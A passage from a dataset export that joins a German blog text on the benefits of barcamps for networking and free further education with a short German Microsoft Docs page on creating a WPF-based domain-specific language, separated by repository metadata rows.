Du interessierst dich für ein bestimmtes Thema, aber hast keine Ahnung, wo du dich detaillierter darüber informieren kannst, wer Experte auf dem Gebiet ist und mit wem du dich potenziell austauschen könntest? Barcamp sei Dank ist das kein Problem mehr – denn ziemlich schnell entwickelst du ein Gefühl dafür, wer Ahnung von der Branche deiner Wahl hat. Umso besser für dich! Du kannst diesen Leuten Fragen stellen, dir Tipps holen und dir einfach etwas von ihrem Glitzer abtupfen. Nach dem Barcamp weißt du z.B. besser, wem du auf Twitter folgen solltest, um auf dem Laufenden zu bleiben, wo und wie du wichtige Informationen am schnellsten herbekommst und wer dazu die größte Expertise hat.
Social Media Vernetzung
Mein Tipp: Schaue dir im Vorfeld, während des Barcamps oder auch danach die anderen Teilnehmerinnen und Teilnehmer an. Viele Barcamp-Organisatoren arbeiten für das Ticketing mit Xing zusammen, wie zum Beispiel das Barcamp Koblenz, das vom 17. – 18. Juni 2016 stattfindet. Nach dem Kauf eines Tickets kriegst du die anderen Teilnehmer angezeigt.
Gute dir gezielt die Leute an, die “interessant” für dich sind, die deinen Traumjob ausüben oder in der Branche arbeiten, in die du gerne rein würdest. Wenn du nach einer kurzen Google- oder Social Media-Recherche feststellst, dass eine bestimmte Person total spannend für dich ist, nutze das Barcamp, um ihn oder sie anzusprechen. Auch eine Einladung auf einen Kaffee im Vorfeld kann eine gute Idee sein. So haben Jana und ich uns übrigens kennengelernt – heute sind wir Blogpartnerinnen und Co-Gründerinnen. Das zeigt mal wieder: man weiß nie, was sich so entwickeln kann!
Alles vor deiner Haustür
Besonders cool finde ich bei Barcamps, dass sie einen starken regionalen Charakter haben. Schon seit Kraftklub wissen wir: nicht jeder möchte nach Berlin ziehen, und das ist auch überhaupt nicht nötig. Auch woanders gibt es tolle Initiativen, Menschen und Events. Dieser regionale Fokus ist perfekt für alle, die sich umgucken wollen, was und wen es sonst noch so in der Region gibt. Das ist sowohl für Selbstständige als auch für Bewerber und Angestellte eine gute Sache.
Weiterbildung für den schmalen Geldbeutel
Hast du schon mal nachgesehen, was so eine Social Media-Schulung eigentlich kostet? Und ein Workshop über Programmier-Basics? Von einem Rhetorik-Seminar ganz zu schweigen. Äh…, gibt’s das auch in billiger?
Die Antwort ist: Ja! Bei einem Barcamp herrscht ein schönes und munteres Geben und Nehmen. Ein “Experte” in einem Thema bietet kostenlos eine Session an, einfach um sein Wissen mit anderen zu teilen. Du kannst jede Session besuchen, einfach so. Selbstverständlich kannst du auch eine Session oder einen Vortrag anbieten – musst du aber nicht.
Vom geballten Know-How der anderen Teilnehmer kannst du also gnadenlos profitieren. Ich persönlich habe Dinge gelernt, über die ich schon immer mal mehr wissen wollte – von Suchmaschinenoptimierung und den besten WordPress-Plugins über Creative Commons-Bilder. Um einen genaueren Eindruck des Themenspektrums eines Barcamps zu bekommen, schau dir einfach mal einen Beispiel-Sessionplan an. Da ist für jeden Geschmack und jeden Kenntnisstand etwas Interessantes dabei. Das wahre Problem besteht am Ende tatsächlich darin, sich bei der Masse an hochwertigen Sessions zu entscheiden!
Du kannst dich selbst einbringen
Wie gesagt kannst du auch selbst Sessions anbieten und dich so selbst einbringen, positionieren und sichtbar werden. Nervös sein brauchst du nicht, denn niemand erwartet, dass du eine perfekte Bühnenshow ablieferst. Was kannst du gut, für welches Thema brennst du, worüber könntest stundenlang erzählen? Es gibt sicher Leute, die sich für dein Know-How und deine Perspektive interessieren. Ich wurde damals beim Bier von jemand sehr nettem überzeugt, meine eigene Session zum Thema Bloggen und Beruf zu halten. Obwohl ich im Vorfeld natürlich nervös war, ist es super gelaufen und hat mir großen Spaß gemacht. Seitdem halte ich gerne und regelmäßig Vorträge, gebe mein Wissen hier im Blog oder bei YouTube und seit kurzem sogar in Webinaren weiter. Wer weiß, wie es dich weiterbringt, wenn du dich traust?
| 131.396552 | 805 | 0.812361 | deu_Latn | 0.999706 |
e05c9c33e38ed35a1fecc3a3a1ce2a512d964b36 | 1,272 | md | Markdown | docs/vs-2015/modeling/creating-a-wpf-based-domain-specific-language.md | Birgos/visualstudio-docs.de-de | 64595418a3cea245bd45cd3a39645f6e90cfacc9 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/modeling/creating-a-wpf-based-domain-specific-language.md | Birgos/visualstudio-docs.de-de | 64595418a3cea245bd45cd3a39645f6e90cfacc9 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/modeling/creating-a-wpf-based-domain-specific-language.md | Birgos/visualstudio-docs.de-de | 64595418a3cea245bd45cd3a39645f6e90cfacc9 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Erstellen einer WPF-basierten domänenspezifischen Sprache | Microsoft-Dokumentation
ms.custom: ''
ms.date: 11/15/2016
ms.prod: visual-studio-tfs-dev14
ms.reviewer: ''
ms.suite: ''
ms.tgt_pltfrm: ''
ms.topic: article
ms.assetid: 917519ad-138f-4869-8158-243014c7ca1d
caps.latest.revision: 8
author: gewarren
ms.author: gewarren
manager: douge
ms.openlocfilehash: 2d8884aa3e9a3fcbffe6c2bb962f69384b00383d
ms.sourcegitcommit: 9ceaf69568d61023868ced59108ae4dd46f720ab
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 10/12/2018
ms.locfileid: "49281085"
---
# <a name="creating-a-wpf-based-domain-specific-language"></a>Erstellen einer WPF-basierten domänenspezifischen Sprache
[!INCLUDE[vs2017banner](../includes/vs2017banner.md)]
Sie können eine domänenspezifische Sprache erstellen, die einen WPF-Designer statt einem grafischen Designer verfügt.
Informationen und Beispiele zu diesem Feature können auf dem Visual Studio-Visualisierungs und Modellierungstools-Website unter gefunden werden [http://go.microsoft.com/fwlink/?LinkId=186128](http://go.microsoft.com/fwlink/?LinkId=186128)
## <a name="see-also"></a>Siehe auch
[So definieren Sie eine domänenspezifische Sprache](../modeling/how-to-define-a-domain-specific-language.md)
| 37.411765 | 241 | 0.794811 | deu_Latn | 0.703629 |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.